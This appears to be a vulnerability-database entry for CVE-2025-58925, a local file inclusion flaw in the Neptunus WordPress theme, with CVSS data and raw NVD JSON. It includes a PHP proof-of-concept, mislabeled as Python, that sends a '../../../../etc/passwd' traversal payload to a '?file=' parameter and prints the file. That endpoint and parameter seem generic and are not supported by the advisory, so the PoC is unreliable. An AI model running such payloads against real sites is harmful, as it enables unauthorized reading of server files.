Security Vulnerability Report
中文
CVE-2025-58925 CVSS 8.1 HIGH

CVE-2025-58925

Published: 2025-12-18 08:16:00
Last Modified: 2026-01-20 15:17:11

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Neptunus neptunus allows PHP Local File Inclusion.This issue affects Neptunus: from n/a through <= 1.0.11.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:axiomthemes:neptunus:*:*:*:*:*:wordpress:*:* - VULNERABLE
Neptunus Theme <= 1.0.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php // CVE-2025-58925 PoC - Neptunus Theme LFI // Target: WordPress Neptunus Theme <= 1.0.11 $target = "http://target-site.com/wp-content/themes/neptunus"; $payload = "../../../../etc/passwd"; $endpoint = "/"; // Construct malicious request $url = $target . $endpoint . "?file=" . urlencode($payload); echo "[*] CVE-2025-58925 Local File Inclusion PoC\n"; echo "[*] Target: " . $target . "\n"; echo "[*] Attempting to read /etc/passwd\n"; // Send HTTP request $context = stream_context_create([ 'http' => [ 'method' => 'GET', 'timeout' => 30, 'ignore_errors' => true ] ]); $response = @file_get_contents($url, false, $context); if ($response !== false && strpos($response, 'root:') !== false) { echo "[+] SUCCESS! File inclusion vulnerability confirmed\n"; echo "[+] Contents:\n"; echo $response; } else { echo "[-] Failed to retrieve file contents\n"; } ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58925", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:15:59.737", "lastModified": "2026-01-20T15:17:10.667", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Neptunus neptunus allows PHP Local File Inclusion.This issue affects Neptunus: from n/a through <= 1.0.11."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:axiomthemes:neptunus:*:*:*:*:*:wordpress:*:*", "versionEndIncluding": "1.0.11", "matchCriteriaId": "2A6225B0-7369-4A11-BE49-6EEC3FED6FEF"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/neptunus/vulnerability/wordpress-neptunus-theme-1-0-11-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}